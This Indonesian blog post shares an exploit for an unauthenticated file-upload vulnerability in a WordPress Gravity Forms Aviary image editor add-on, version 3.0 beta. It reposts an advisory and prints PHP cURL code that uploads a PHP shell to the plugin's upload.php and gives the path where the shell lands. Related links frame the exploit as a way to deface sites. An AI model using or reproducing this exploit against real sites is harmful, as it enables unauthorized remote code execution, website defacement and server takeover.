WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability

Leave a Comment

Kali ini ane mau share Exploit WordPress Aviary Image Editor Add On For Gravity Forms 3.0 Beta Shell Upload Vulnerability, langsung saja yuk :D

= Author: Larry W. Cashdollar, @_larry0
= Date: 2015-06-07
= Download Site: https://wordpress.org/plugins/aviary-image-editor-add-on-for-gravity-forms
= Vendor: Waters Edge Web Design and NetherWorks LLC
= Vendor Notified: 2015-06-08
= Advisory: http://www.vapid.dhs.org/advisory.php?v=125
= Vulnerability in 'upload.php': BLANK Page


There is a remote file upload vulnerability in aviary-image-editor-add-on-for-gravity-forms/includes/upload.php as an unauthenticated user can upload any file to the system.  Including a .php file.  The upload.php doesn't check that the user is authenticated and a simple post will allow arbitrary code to be uploaded to the server.

Exploit Code :


/*Remote shell upload exploit for aviary-image-editor-add-on-for-gravity-forms v3.0beta */
/*Larry W. Cashdollar @_larry0

shell will be located http://www.vapidlabs.com/wp-content/uploads/gform_aviary/_shell.php

  $target_url = 'http://www.vapidlabs.com/wp-content/plugins/aviary-image-editor-add-on-
 $file_name_with_full_path = '/var/www/nameshell.php';
 echo "POST to $target_url $file_name_with_full_path";
 $post = array('name' => 'nameshell.php','gf_aviary_file'=>'@'.$file_name_with_full_path);
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL,$target_url);
 curl_setopt($ch, CURLOPT_POST,1);
 curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 $result=curl_exec ($ch);
 curl_close ($ch);
 echo "<hr>";
 echo $result;
 echo "<hr>";


Sekaian dan Terima Kasih,
Wassalamualaikum wr.wb

Cara Deface Dengan Aviary Imaege Editor
Deface Dengan WP Aviary Image Editor
Previous PostPosting Lama Beranda

0 komentar:

Posting Komentar

Diberdayakan oleh Blogger.